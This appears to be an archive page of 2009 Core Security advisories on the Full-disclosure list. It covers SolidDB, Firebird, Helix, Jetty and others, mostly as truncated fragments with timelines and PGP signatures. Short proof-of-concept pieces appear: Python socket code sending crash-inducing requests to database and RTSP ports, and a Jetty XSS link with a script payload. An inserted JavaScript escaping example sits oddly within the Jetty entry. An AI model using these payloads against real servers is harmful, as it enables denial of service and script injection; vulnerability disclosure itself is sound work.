security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: GnuPT v3.6.3
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iEYEARECAAYFAksgL9IACgkQyNibggitWa3csgCfdV5dyeDFf1r+/yNIO6PpDgvk
LJgAoKTesYDuoe6SpJzMhPKujbi1Z0vV
=H22d
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2009-0911: DAZ Studio Arbitrary Command Execution

2009-12-03 Thread CORE Security Technologies Advisories
 comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAksYGpcACgkQyNibggitWa3lrwCeKY5DAHCr9PaZ1Dk6FqMcrbUx
mR8AoK6zHf4Ns/xzngH5kT+f4MDwbUpF
=l/I+
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2009-0908: Autodesk SoftImage Scene TOC Arbitrary Command Execution

2009-11-23 Thread CORE Security Technologies Advisories
of response from Autodesk, Core decides to publish the
advisory CORE-2009-0908 as a user release.



9. *References*

[1] The authors participated in Core Bugweek 2009 as members of the
team Gimbal Lock N Load.
[2]
http://usa.autodesk.com/adsk/servlet/pc/index?siteID=123112id=13571168


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: http://www.coresecurity.com/corelabs.


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iEYEARECAAYFAksK5XkACgkQyNibggitWa0Y9gCfWWW7WNOXTqp8vLzSZaLPYXkr
lioAoJBrvffk0he38J/wRbQ4jOrWOKXR
=ce7Z
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2009-0909: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution

2009-11-23 Thread CORE Security Technologies Advisories
. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: http://www.coresecurity.com/corelabs.


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN
TPwAn1AMCamFLaX3gHyUys//tHcyhlvn
=fPrL
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2009-0910: Autodesk Maya Script Nodes Arbitrary Command Execution

2009-11-23 Thread CORE Security Technologies Advisories


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: http://www.coresecurity.com/corelabs.


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iEYEARECAAYFAksK5eoACgkQyNibggitWa2e1gCeM9FzHnlmxrmA4dvfO8Dgp2Zm
B3oAoKymyyouTh4rjoDIsHdhF/Ho50lQ
=YfZn
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2009-1027: IBM SolidDB invalid error code vulnerability

2009-11-18 Thread CORE Security Technologies Advisories
 = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect ((target_ip, 2315))

s.send(a)
s.close()

-----/



9. *Report Timeline*

. 2009-10-23:
Core Security Technologies sends an email to IBM AIX Security team
requesting a security point of contact to report security bugs in
SolidDB and asks whether the report should be sent to SolidDB security
instead.

. 2009-10-27:
IBM AIX Security replies indicating that they forwarded the request to
SolidDB's development team.

. 2009-10-27:
SolidDB's QA Manager contacts Core acknowledging the request originally
sent to AIX Security and indicating that, although there isn't an
established formal channel to report security bugs in SolidDB, the report
could be sent directly to him.

. 2009-10-27:
Core Security Technologies replies stating that a draft technical
document describing the problem is being prepared and will be sent to
SolidDB as soon as it is available. In the meantime, Core indicates that
a third-party vendor may have already reported the problem and requests
confirmation that said vendor recently reported a remote denial of
service vulnerability in the database service.

. 2009-11-10:
Core sends the advisory with full technical details to the SolidDB team
and informs them that its publication is set for December 7th, 2009, and
that the date may change if the publication of patches is coordinated
for a date agreed between Core and IBM SolidDB. Core requests
confirmation that a SolidDB OEM customer [2] has already reported the
bug and received patches.

. 2009-11-17:
IBM SolidDB publishes patches to the vulnerable products.

. 2009-11-18:
Advisory CORE-2009-1027 published.



10. *References*

[1] IBM SolidDB
http://www-01.ibm.com/software/data/soliddb/
[2] HP Openview NNM 7.53 Invalid DB Error Code vulnerability
http://www.coresecurity.com/content/openview_nnm_internaldb_dos


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAksEO4YACgkQyNibggitWa1laACgik+qyd+ZQVgVPiERCKXVGCu/
kPgAoKAmw/r3PKYxfPb9Q2RC4Bzc8tbh
=mnrD
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2009-0814: HP Openview NNM 7.53 Invalid DB Error Code vulnerability

2009-11-17 Thread CORE Security Technologies Advisories
 Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAksDICYACgkQyNibggitWa2//ACdFpN6SK4B59Iza5Nq88oASfat
YhoAn24UcNlJ/lpKv4brl4d6mctKfwMF
=cR49
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2009-0922: Jetty Persistent XSS in Sample Cookies Application

2009-10-06 Thread CORE Security Technologies Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

Jetty Persistent XSS in Sample Cookies Application



1. *Advisory Information*

Title: Jetty Persistent XSS in Sample Cookies Application
Advisory Id: CORE-2009-0922
Advisory URL: http://www.coresecurity.com/content/jetty-persistent-xss
Date published: 2009-10-06
Date of last update: 2009-10-06
Vendors contacted: Jetty Team
Release mode: Coordinated release



2. *Vulnerability Information*

Class: Persistent Cross-site Scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: N/A



3. *Vulnerability Description*

Jetty [1] includes several sample web applications for the developer to
learn from. One of them sets cookies with user-supplied data and then
dumps them as HTML. This application does not filter the user-supplied
data when outputting it to the visitor. This constitutes a persistent
XSS vulnerability [2].

This application accepts the cookie content as a GET parameter. This
allows an attacker to trick someone into clicking a handcrafted link
with malicious code as the cookie content, and thus executing that code
in a privileged domain, such as localhost, any domain in the intranet
zone, or a domain where another web application is running. For example,
the following link will result in JavaScript code being executed on the
localhost domain if the victim has deployed a default installation of
Jetty on their workstation:
http://localhost:8080/cookie/?Name=aaa&Value=bbb<script>alert(1)</script>bbbccc&Age=.



4. *Vulnerable packages*

   . Jetty 6.1.19
   . Jetty 6.1.20


5. *Non-vulnerable packages*

   . Jetty 6.1.21
   . Jetty 7.0.0


6. *Vendor Information, Solutions and Workarounds*

A workaround is to disable this particular example on any running
instance of Jetty in a particular workstation. Examples should always be
disabled on production servers, as recommended by the software vendor.


7. *Credits*

This vulnerability was discovered by Aureliano Calvo from Core Security
Technologies during Bugweek 2009 [3].


8. *Technical Description / Proof of Concept Code*

The problem resides in the 'CookieDump.java' file from the examples.

/-----
Cookie[] cookies = request.getCookies();

for (int i = 0; cookies != null && i < cookies.length; i++)
{
    // The cookie name and value are written into the page verbatim.
    out.println("<b>" + cookies[i].getName() + "</b>=" + cookies[i].getValue() + "<br/>");
}

-----/
'cookies[i].getValue()' should be filtered (HTML-encoded) before it is
written to the output, so that injected markup is rendered as text
rather than executed.
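The fix, shown as an added JavaScript example rather than in Jetty's Java (this is not the project's code): `escapeHtml`, `parseCookieHeader`, `dumpCookiesUnsafe` and `dumpCookiesSafe` are constructed names, and the sample Cookie header is constructed. The unsafe renderer mirrors the `out.println` line above; the safe one encodes both the cookie name and the cookie value at the point of output, which is the encoding the advisory asks for.

```javascript
// Added example: not Jetty's code. A JavaScript rendering of the
// CookieDump pattern, once as the advisory quotes it (values interpolated
// raw) and once with HTML entity encoding applied to every untrusted field.

// Minimal HTML entity encoder for text placed between tags. It encodes the
// five characters that can open a tag, close a tag or end an attribute.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed parser for a Cookie request header -> [{name, value}].
// Values are kept verbatim, as a servlet container's getCookies() would.
function parseCookieHeader(header) {
  if (!header) return [];
  return header
    .split(";")
    .map((part) => part.trim())
    .filter((part) => part.length > 0)
    .map((part) => {
      const eq = part.indexOf("=");
      return eq < 0
        ? { name: part, value: "" }
        : { name: part.slice(0, eq), value: part.slice(eq + 1) };
    });
}

// Vulnerable rendering: mirrors
//   out.println("<b>"+name+"</b>="+value+"<br/>");
// Anything the client put in the cookie lands in the page as markup.
function dumpCookiesUnsafe(cookies) {
  return cookies
    .map((c) => "<b>" + c.name + "</b>=" + c.value + "<br/>")
    .join("\n");
}

// Hardened rendering: encode name and value at the point of output. The
// markup the application intends (<b>, <br/>) is still emitted as markup;
// only the untrusted text is neutralised.
function dumpCookiesSafe(cookies) {
  return cookies
    .map((c) => "<b>" + escapeHtml(c.name) + "</b>=" + escapeHtml(c.value) + "<br/>")
    .join("\n");
}

// Demo with a constructed header carrying the advisory's test string.
const SAMPLE_COOKIE_HEADER = "Name=aaa; Value=bbb<script>alert(1)</script>";
if (typeof require !== "undefined" && require.main === module) {
  const demo = parseCookieHeader(SAMPLE_COOKIE_HEADER);
  console.log(dumpCookiesUnsafe(demo));
  console.log(dumpCookiesSafe(demo));
}
```

Encoding is applied on output, not on input: the cookie may legitimately contain `<` or `&`, and the same value might later be written into a JavaScript string or an attribute, each of which needs its own encoder. Note also that a cookie name is attacker-controlled just like its value, so both fields are encoded.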


9. *Report Timeline*

. 2009-09-22:
Core Security Technologies contacts Jan Bartel and Greg Wilkins from
Webtide, notifying them of the existence of an XSS vulnerability in a
sample application. Core sends its PGP key and asks Jan for his, should
he wish to keep future communications encrypted.

. 2009-09-23:
Greg Wilkins asks for technical information about the vulnerability in
plaintext. He also comments that some vulnerabilities have been fixed in
the 6.1.21 and 7.0 releases, and asks Core to verify if the reported
vulnerability has already been fixed in their repositories.

. 2009-09-23:
Technical details are sent by Core, specifying that the Persistent XSS
that was discovered has not been fixed in the repositories pointed to by
Greg. Core asks for a release date for the fixed version of Jetty in
order to release the advisory only when a fixed version is available.

. 2009-09-24:
Greg Wilkins acknowledges the vulnerability and confirms it will be
fixed in release 7.0.0, due in the week of September 28th. A release date
for Jetty 6.1.22 is not yet scheduled. Greg mentions that the
recommended workaround for production servers is not to deploy the
example applications.

. 2009-09-28:
Core reminds Greg that a deadline for the release of this advisory has
been set to Monday October 5th.

. 2009-09-28:
Greg Wilkins agrees with the proposed publication date, since there is a
good workaround.

. 2009-10-06:
The advisory CORE-2009-0922 is published.



10. *References*

[1] http://jetty.mortbay.org/
[2] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
[3] The author participated in Core Bugweek 2009 as member of the team
Bugged Coffee.


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security 

[Full-disclosure] CORE-2009-0820 - Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server

2009-09-09 Thread CORE Security Technologies Advisories
,
including technical details of the vulnerability in an advisory draft.

. 2009-08-21:
Simon Kelley acknowledges the vulnerability and confirms that he is
working on a patch. He also points out that most home router
distributions have TFTP turned off by default, and firewalled, and
suggests this should be mentioned in the advisory. Simon also mentions
that a NULL-pointer dereference bug has been discovered in the same
code, and suggests merging both bugs into the same advisory. Monday 31/08
is accepted as a possible release date for this advisory, and help is
offered in contacting the dnsmasq package maintainers of most operating
systems.

. 2009-08-21:
Core changes the advisory draft to accommodate Simon's suggestions.
About the NULL-pointer dereference, Core mentions the terms it thinks
appropriate for the bug to be merged into this advisory, and details how
this would affect the following procedures, such as asking for a
CVE/Bugtraq ID.

. 2009-08-23:
Simon Kelley contacts Core back, saying that the terms for the
NULL-pointer dereference bug to be included in the advisory are
acceptable. He also mentions that the finder of this bug prefers to
remain uncredited in this advisory. He sends details of the new bug so
that the advisory draft can be updated to include it.

. 2009-08-23:
Core asks for proper CVE and Bugtraq ID numbers, specifying it believes
each vulnerability reported in this advisory should be assigned its own.

. 2009-08-23:
Vincent Danen, from Red Hat's Security Response Team, contacts Core in
order to discuss both vulnerabilities over a secure communications
channel, and offers help in obtaining proper CVE numbers, specifying
that Red Hat also believes a separate number should be assigned to each
vulnerability.

. 2009-08-23:
Core replies to Vincent Danen by sending its GPG key. Core also mentions
that separate CVE numbers have already been requested.

. 2009-08-23:
Core replies to Simon Kelley, including a new advisory draft with both
bugs merged.

. 2009-08-23:
Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends
them to Red Hat and Simon Kelley.

. 2009-08-31:
The advisory CORE-2009-0820 is published.






12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFKp9rOyNibggitWa0RAjkbAJ0SLIFwI1CMF7IOHSDv+Fg0DwFNQwCfWsZm
wa3syAdyXlixVdQhdk5vcK0=
=tfqM
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CORE-2009-0820: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server

2009-08-31 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2009-0727: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability

2009-08-18 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2009-0707: Firebird SQL op_connect_request main listener shutdown vulnerability

2009-07-28 Thread CORE Security Technologies Advisories
.


port = 3050
host = '192.168.131.128'#Replace with your target host
attack(host, port)

- ---/



9. *Report Timeline*

. 2009-07-15:
Core Security Technologies notifies the Firebird team of the vulnerability.

. 2009-07-16:
Firebird team requests technical details in plaintext.

. 2009-07-16:
Core sends the advisory draft, including technical details.

. 2009-07-20:
Firebird team notifies that the issue is resolved in all branches of the
Firebird repository [2]. Technical details will be publicly visible when
Core releases its advisory. Firebird team notes that Firebird version
1.5.5 (marked as non-vulnerable in the advisory draft) seems to be
affected.

. 2009-07-27:
Core sends the final version of the advisory to the Firebird team.

. 2009-07-28:
The advisory CORE-2009-0707 is published.



10. *References*

[1] http://www.firebirdsql.org
[2] http://tracker.firebirdsql.org/browse/CORE-2563




[Full-disclosure] CORE-2009-0227: Real Helix DNA RTSP and SETUP request handler vulnerabilities

2009-07-17 Thread CORE Security Technologies Advisories
(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('172.16.132.133',554))

setRequest = "SETUP / RTSP/1.0\r\n\r\n"

s.send(setRequest)
s.close()

- ---/


9. *Report Timeline*

. 2009-03-04:
Core Security Technologies notifies RealNetworks of the vulnerability.
Core initially schedules publication of its advisory to April 6th, 2009.

. 2009-03-16:
Core again notifies RealNetworks of the vulnerability.

. 2009-03-16:
RealNetworks identifies the vulnerability alert as SPAM.

. 2009-03-20:
The RealNetworks team asks Core for a technical description of the
vulnerability.

. 2009-03-23:
Technical details are sent to the RealNetworks team by Core.
RealNetworks acknowledges receipt.

. 2009-03-30:
Core requests information about the plans of RealNetworks to fix the
vulnerabilities.

. 2009-03-30:
RealNetworks responds that fixes will be included in the next public
release - currently targeted for July 2009.

. 2009-05-04:
Core requests from RealNetworks a technical analysis of the
vulnerabilities, a list of the affected versions of Helix Server, and a
detailed timeline for developing, testing and releasing fixes for these
vulnerabilities. Only on the basis of that information can Core
reevaluate its advisory publication timeframe (publication was
originally scheduled for April 6).

. 2009-05-05:
RealNetworks responds that fixes will be available in mid-2009, most
likely in the July time frame, and that to protect its customer base
RealNetworks will not provide additional details until the release is
publicly available.

. 2009-05-05:
Core requests a more precise estimation for the release of fixes (no
reply received).

. 2009-05-29:
Core again requests from RealNetworks an estimated date for the release
of fixes, and technical details about the issues. In the meantime, the
publication of advisory CORE-2009-0227 is rescheduled for July 15th (no
reply received).

. 2009-07-16:
An updated version of the advisory is sent to RealNetworks by Core.
Core again requests information about this issue.

. 2009-07-17:
Core is made aware that RealNetworks has released Security Update
071409HS [2] on July 14th, which states that version 13.0.0 of the Helix
Server and the Helix Mobile Server have been updated to ensure that the
above vulnerabilities have been resolved.

. 2009-07-17:
The advisory CORE-2009-0227 is published by Core.



10. *References*

[1] RealNetworks
http://www.realnetworks.com/
[2] RealNetworks Security Update 071409HS
http://docs.real.com/docs/security/SecurityUpdate071409HS.pdf



[Full-disclosure] CORE-2009-0519 - Awingsoft Awakening Winds3D Viewer remote command execution vulnerability

2009-07-08 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2009-01515 - WordPress Privileges Unchecked in admin.php and Multiple Information

2009-07-08 Thread Core Security Technologies Advisories


[Full-disclosure] CORE-2009-0521 - DX Studio Player Firefox plug-in command injection

2009-06-09 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2008-0826 - Internet Explorer Security Zone restrictions bypass

2009-06-09 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2009-0420 - Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability

2009-06-02 Thread CORE Security Technologies Advisories
 according to the comments
made by Debian Team.

. 2009-05-28:
Core notifies that the advisory is going to be released on June 2nd, and
requests a confirmation from Apple Security Team and vendor-sec
subscribers.

. 2009-05-29:
Apple Security Team, Red Hat Security Response Team and Debian Team
confirm the proposed release date. There was no request for embargo date
shift posted to vendor-sec.

. 2009-06-02:
The advisory CORE-2009-0420 is published.


10. *References*

[1] http://www.cups.org.
[2] Vendor-sec, a mailing list dedicated to distributors of operating
systems using (but not necessarily solely comprised of) free and
open-source software.
http://oss-security.openwall.org/wiki/mailing-lists/vendor-sec.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFKJY7HyNibggitWa0RAtcuAJ9vxQ4OjXhyOepyzgUg8WvG8rCMlACgsUTK
A3cfFRppX8VCa6hzPcVEOiw=
=G46K
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2009-0109 - Multiple XSS in Sun Communications Express

2009-05-20 Thread CORE Security Technologies Advisories
 as soon as possible.

. 2009-05-08:
Sun engineering team informs they are still experiencing some delays
with the final stages of this release process and asks to delay the
publication of the advisory.

. 2009-05-18:
Sun engineering team confirms that they have resolved the outstanding
issues related to this vulnerability and they expect to be ready to
publish the fixes on Wednesday 20th May.

. 2009-05-18:
Core re-schedules the advisory publication date to 20th May.

. 2009-05-20: The advisory CORE-2009-0109 is published.


10. *References*

[1]
http://www.sun.com/software/products/calendar_srvr/comms_express/index.xml
[2] HTML Code Injection and Cross-Site Scripting
http://www.technicalinfo.net/papers/CSS.html.
[3] The Cross-Site Scripting FAQ (XSS)
http://www.cgisecurity.com/articles/xss-faq.shtml
[4] How to prevent Cross-Site Scripting Security Issues
http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985
[5] How to review ASP Code for CSSI Vulnerability
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253119
[6] How to review Visual InterDev Generated Code for CSSI Vulnerability
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253120
[7] HTTP Response Splitting vulnerability in Sun Delegated Administrator
- http://www.coresecurity.com/content/sun-delegated-administrator


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFKFEWVyNibggitWa0RAqSuAKCRr0zxGIvhYRVD92VLI7W1pJezQwCfVvSO
SNbJmS6GjYkZPyIfI3+JIpw=
=wOZe
-----END PGP SIGNATURE-----



Re: [Full-disclosure] [Advisories] CORE-2009-0114 - HTTP Response Splitting vulnerability in Sun Delegated Administrator

2009-04-22 Thread Core Security Technologies advisories
Sergio 'shadown' Alvarez wrote:
> Hi,
>
> In the last CORE's advisories I've seen the following credits:
>
> 7. *Credits*
>
> This vulnerability was discovered by the SCS team [3] from Core Security
> Technologies.
>
>
> Does this SCS team's guy have a name ?
> Even in a football match 'the team' wins the match, but the GOALS are
> made by somebody that deserves the credits.
>
Yes, they have names and they did not want them to appear in the advisory.

Thank you for your continued interest in crediting vulnerability
discoverers for their findings and your insightful comments about sports.

-ivan




[Full-disclosure] CORE-2009-0114 - HTTP Response Splitting vulnerability in Sun Delegated Administrator

2009-04-21 Thread CORE Security Technologies Advisories
/whitepaper_httpresponse.pdf.
[2]
http://www.webappsec.org/projects/threat/classes/http_response_splitting.shtml.

[3] Core Security Consulting Services -
http://www.coresecurity.com/content/services-overview-core-security-consulting-services.

[4] Multiple vulnerabilities in Sun Calendar Express Web Server -
http://www.coresecurity.com/content/sun-calendar-express.


14. *PGP/GPG Keys*

